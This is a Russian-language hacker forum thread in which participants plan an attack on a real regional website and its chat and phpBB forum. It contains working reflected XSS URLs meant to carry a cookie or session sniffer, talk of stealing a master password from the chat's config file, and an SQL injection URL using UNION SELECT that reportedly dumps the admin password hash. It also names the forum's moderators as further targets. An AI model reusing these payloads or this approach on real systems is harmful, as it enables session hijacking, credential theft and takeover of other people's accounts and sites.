http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>

подставь сниффер и закодируй в URL

Поставил сниффер а как URL закодировать,
и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!

Вот если я подставляю снифер:
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>

а дальше чё???

вот ещё
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3D� �дрес>

я поподробнее посмотрел, там куки красть бесполезно, нужна сессия

И как узнать сессию?
Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу
http://www.nerungri.ru/cgi-bin/chat/config.cgi
его оттуда никак не достать?

http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/*

http://www.nerungri.ru/site/cnews/ar...%20user_id=2/*

вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату

Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?

нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?

Nikita, RaKoT, 1inch